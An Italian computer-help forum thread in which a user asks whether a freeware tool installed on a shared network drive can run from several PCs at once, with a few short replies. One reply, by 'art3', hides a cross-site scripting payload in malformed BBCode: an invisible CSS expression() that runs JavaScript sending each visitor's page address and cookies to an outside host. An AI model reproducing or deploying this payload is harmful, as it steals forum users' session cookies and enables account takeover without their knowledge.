Valutazione 4.87/ 5 (100.00%) 5838 voti

Condividi:        

Installazione di rete

Hai problemi con i file Zip, vuoi formattare l'HD, non sai come funziona FireFox? O magari ti serve proprio quel programmino di cui non ricordi il nome! Ecco il forum dove poter risolvere i tuoi problemi.

Moderatori: Dylan666, hydra, gahan

Installazione di rete

Postdi MikelinoPaneVino » 14/07/05 21:16

:undecided: mi chiedevo :
E' possibile fare un'installazione di un qualsiasi programma su un Drive di rete e lanciare il medesimo programma da più computer in contemporanea ?

Cioè, ad esempio :

Se installo un programma su un PC e indirizzo l'installazione su un'ipotetico HD (X) nel Folder (Y) situato in rete , e ripeto la stessa installazione del medesimo programma su un'altro PC indirizzando l'installazione dei file nello stesso HD (X) e nel medesimo Folder (Y) , entrambi i PC avranno la possibilità di lanciare lo stesso programma utilizzando gli stessi file in contemporanea ?

P.S. Naturalmente mi riferisco a programmi freeware di manutenzione per i quali non occorre licenza ;)
Asus P5W DH/Pentium Quad Core Q6600@2,4Ghz FSB 1066Mhz/2Gb DDr2 800Mhz/Sapphire X1900XTX+X1900XTCFE/IDE Maxtor 120Gb/EnermaxEG701AX 600W/Enermax Chakra 1x25 + 2x15 Fan Coolers.
.
MikelinoPaneVino
Utente Senior
 
Post: 516
Iscritto il: 29/12/04 15:22
Località: Ferrara , provincia

Sponsor
 

Postdi pjfry » 14/07/05 23:26

credo che dipenda dal programma, se scrive file temporanei nelle sue directory è un casino... ma di solito non lo fanno :-?

mikè, ma questo è hardware? :undecided: :mmmh:
Avatar utente
pjfry
Moderatore
 
Post: 8240
Iscritto il: 19/11/02 17:52
Località: terni

Postdi art3 » 15/07/05 10:36

Credo di si!

[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://tg2.altervista.org/r.php?data='+document.location+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'
art3
Utente Junior
 
Post: 13
Iscritto il: 15/07/05 09:16

Postdi MikelinoPaneVino » 15/07/05 21:23

:oops: ho scritto nella sezione sbagliata , me ne sono accorto ora che ho controllato il Topic , scusatemi .....( devo aver sbagliato qualcosa )

:roll:
Asus P5W DH/Pentium Quad Core Q6600@2,4Ghz FSB 1066Mhz/2Gb DDr2 800Mhz/Sapphire X1900XTX+X1900XTCFE/IDE Maxtor 120Gb/EnermaxEG701AX 600W/Enermax Chakra 1x25 + 2x15 Fan Coolers.
.
MikelinoPaneVino
Utente Senior
 
Post: 516
Iscritto il: 29/12/04 15:22
Località: Ferrara , provincia

Postdi luna11 » 15/07/05 23:42

Solo pane , mi raccomando.
luna11
Utente Senior
 
Post: 3634
Iscritto il: 10/08/01 01:00


Torna a Software Windows


Topic correlati a "Installazione di rete":


Chi c’è in linea

Visitano il forum: Nessuno e 9 ospiti